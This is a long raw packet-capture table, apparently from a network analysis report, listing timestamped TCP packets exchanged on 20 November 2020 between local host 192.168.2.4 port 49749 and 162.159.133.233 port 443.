                                                                                                                                                Nov 20, 2020 11:27:17.614293098 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614305019 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614309072 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614316940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614350080 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614361048 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614363909 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614371061 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614379883 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614397049 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614422083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614445925 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614470959 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614506960 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614506960 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614511967 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614533901 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614557981 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614579916 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614588976 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614593029 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614604950 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614630938 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614655018 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614664078 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614669085 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614679098 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614702940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614728928 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614753008 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614757061 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614761114 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614775896 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614799976 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614823103 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614825964 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614830017 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614854097 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614881992 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614907980 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614908934 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614914894 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614924908 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614948988 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614973068 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.614974976 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.614984989 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.615006924 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615030050 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615052938 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615056992 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.615062952 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.615077019 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615097046 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615117073 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.615138054 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.615143061 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.615448952 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.631973028 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632013083 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632030010 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632050037 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632072926 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632088900 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632097006 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632121086 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632164001 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632178068 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632190943 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632213116 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632235050 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632245064 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632261038 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632285118 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632307053 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632328987 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632349014 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632370949 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632383108 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632388115 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632397890 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632421970 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632446051 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632457972 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632462025 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632471085 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632498980 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632512093 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632529974 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632551908 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632565022 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632569075 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632575989 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632596970 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632618904 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632642031 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632667065 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632671118 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632673979 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632690907 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632711887 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632734060 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632756948 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632756948 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632761955 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632781982 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632807970 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632829905 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632839918 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632843971 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632857084 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632883072 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632906914 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632916927 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632922888 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.632929087 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632953882 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.632977962 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633003950 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633013964 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633018970 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633028984 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633053064 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633078098 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633086920 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633090019 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633101940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633130074 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633148909 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633167028 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633174896 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633179903 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633184910 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633213043 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633238077 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633263111 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633287907 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633290052 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633296013 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633315086 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633337021 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633362055 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633378029 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633399010 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633409977 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633435011 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633460999 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633465052 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633470058 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633487940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633511066 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633533955 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633553028 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633573055 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633593082 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633605003 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633610010 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633615971 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633641958 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633667946 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633692026 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633693933 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633697987 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633716106 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633740902 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633769035 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633776903 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633780956 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633795023 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633820057 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633848906 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633862019 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633868933 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633873940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633898020 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633919001 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633940935 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633956909 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633960962 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.633963108 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.633986950 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634011984 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634038925 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634040117 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634043932 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634067059 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634089947 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634111881 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634118080 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634123087 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634167910 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634196043 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634208918 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634212971 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634219885 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634243965 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634264946 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634285927 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634291887 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634298086 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634310961 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634335995 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634362936 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634386063 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634388924 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634391069 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634408951 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634428978 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634449959 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634470940 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634474039 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634478092 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634512901 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634519100 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634543896 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634567976 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634588957 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634592056 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634597063 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634610891 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634634018 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634660959 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634670019 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634674072 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634687901 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634712934 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634733915 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634747028 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634751081 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634754896 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634774923 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634788990 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634810925 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634830952 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634834051 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634840012 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634852886 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634879112 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634900093 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634906054 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634910107 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.634921074 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634946108 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634972095 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.634995937 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635005951 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635011911 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635021925 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635046005 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635066986 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635090113 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635090113 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635093927 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635113955 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635138035 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635160923 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635183096 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635184050 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635188103 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635206938 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635231018 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635252953 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635261059 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635266066 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635277033 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635298967 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635323048 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635340929 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635345936 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635345936 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635369062 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635390997 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635415077 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635435104 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635435104 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635438919 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635462046 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635483980 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635509014 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635525942 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635531902 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635533094 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635556936 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635580063 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635600090 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635622025 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635643959 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635644913 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635648012 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635668993 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635694027 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635709047 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635713100 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635719061 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635741949 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635765076 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635787010 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635808945 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635811090 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635816097 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635832071 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635855913 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635879993 CET44349749162.159.133.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:17.635879993 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635891914 CET49749443192.168.2.4162.159.133.233
                                                                                                                                                Nov 20, 2020 11:27:17.635911942 CET44349749162.159.133.233192.168.2.4
